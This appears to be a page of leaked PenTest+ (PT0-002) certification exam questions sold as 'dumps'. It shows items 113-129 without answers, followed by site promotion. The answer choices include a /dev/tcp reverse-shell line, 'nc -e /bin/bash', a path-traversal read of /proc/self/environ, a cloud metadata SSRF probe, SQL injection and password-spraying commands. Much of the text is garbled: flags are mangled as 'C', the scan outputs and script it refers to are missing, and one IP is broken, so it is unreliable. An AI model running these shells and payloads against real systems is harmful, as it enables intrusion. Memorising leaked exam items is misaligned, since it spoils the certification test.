113. A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.

Which of the following is most important for the penetration tester to define FIRST?

Establish the format required by the client.

Establish the threshold of risk to escalate to the client immediately.

Establish the method of potential false positives.

Establish the preferred day of the week for reporting.

114. In Java and C/C++, variable initialization is critical because:

the unknown value, when used later, will cause unexpected behavior.

the compiler will assign null to the variable, which will cause warnings and errors.

the initial state of the variable creates a race condition.

the variable will not have an object type assigned to it.

115. Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?

CeWL

John the Ripper

Hashcat

Hydra

116. During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.

While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

Spawn a local shell.

Disable NI

List processes.

Change the MAC address

117. A penetration tester wants to find the password for any account in the domain without locking any of the accounts.

Which of the following commands should the tester use?

enum4linux -u userl -p /passwordList.txt 192.168.0.1

enum4linux -u userl -p Passwordl 192.168.0.1

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

118. A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack.

Which of the following should a tester perform first?

Test the strength of the encryption settings.

Determine if security tokens are easily available.

Perform a vulnerability check against the hypervisor.

Scan the containers for open ports.

119. A penetration tester is reviewing the security of a web application running in an laaS compute instance.

Which of the following payloads should the tester send to get the running process credentials?

file=http://192.168. 1. 78?+document.cookie

file =.. / .. / .. /proc/self/environ

file='%20or%2054365=54365 ;--

file=http://169.254.169.254/latest/meta-data/

120. Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

Wireshark

EAPHammer

Kismet

Aircrack-ng

Page 13 of 13

121. A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment.

Which of the following would have MOST effectively prevented this misunderstanding?

Prohibiting exploitation in the production environment

Requiring all testers to review the scoping document carefully

Never assessing the production networks

Prohibiting testers from joining the team during the assessment

122. A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems.

Which of the following Nmap commands should the analyst use to achieve This objective?

Nmap CF 192.168.5.5

Map Cdatalength 2.192.168.5.5

Nmap CD 10.5.2.2.168.5.5

Map Cscanflags SYNFIN 192.168.5.5

123. Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

NIST SP 800-53

OWASP Top 10

MITRE ATT&CK framework

PTES technical guidelines

124. A penetration tester runs the following command on a system:

find / -user root Cperm -4000 Cprint 2>/dev/null

Which of the following is the tester trying to accomplish?

Set the SGID on all files in the / directory

Find the /root directory on the system

Find files with the SUID bit set

Find files that were created during exploitation and move them to /dev/null

125. During enumeration, a red team discovered that an external web server was frequented by employees.

After compromising the server, which of the following attacks would best support --------- ---company systems?

Aside-channel attack

A command injection attack

A watering-hole attack

A cross-site scripting attack

126. A penetration tester recently completed a review of the security of a core network device within a corporate environment.

The key findings are as follows:

• The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

• Network management interfaces are available on the production network.

• An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

Enforce enhanced password complexity requirements.

Disable or upgrade SSH daemon.

Disable HTTP/301 redirect configuration.

Create an out-of-band network for management.

Implement a better method for authentication.

Eliminate network management and control interfaces.

127. After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic.

Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

bash -i >& /dev/tcp 8443 0>&l

nc -e host 8443 /bin/bash

nc -vlp 8443 /bin/bash

nc -vp 8443 /bin/bash

128. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

ftp 192.168.53.23

smbclient \\WEB3\IPC$ -I 192.168.53.23 CU guest

ncrack Cu Administrator CP 15worst_passwords.txt Cp rdp 192.168.53.23

curl CX TRACE https://192.168.53.23:8443/index.aspx

nmap C-script vuln CsV 192.168.53.23

129. A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

nmap CoG list.txt 192.168.0.1-254, sort

nmap Csn 192.168.0.1-254, grep “Nmap scan” | awk ‘{print S5}’

nmap C-open 192.168.0.1-254, uniq

nmap Co 192.168.0.1-254, cut Cf 2

TAGS:

PT0-002, PT0-002 exam dumps

Notify of

Label

Name*

Email*

Website

Label

Name*

Email*

Website

0 Comments

Oldest

Newest Most Voted

Inline Feedbacks

View all comments

Get PT0-002 Dumps Full Version

Q&As: 423
Versions: PDF and Software Download Now

About Dumpsinfo

Dumpsinfo is a good platform providing the latest exam information and dumps questions for all IT certification exams. You can study all the latest exam dumps questions online.

[email protected]

Mon - Sat 9:00am - 6:00pm

Online PT0-002 Dumps Help You Understand Questions Well

Related

Posts

CAS-005 Dumps Questions Increase Your Chance of Success

Valid PT0-003 Exam Dumps are Your best Choice to Pass

Prepare N10-009 Exam with Using N10-009 Dump Questions

Online XK0-005 Exam Dumps Help You Build Confidence

About Us

EMAIL

Services

Opening Hours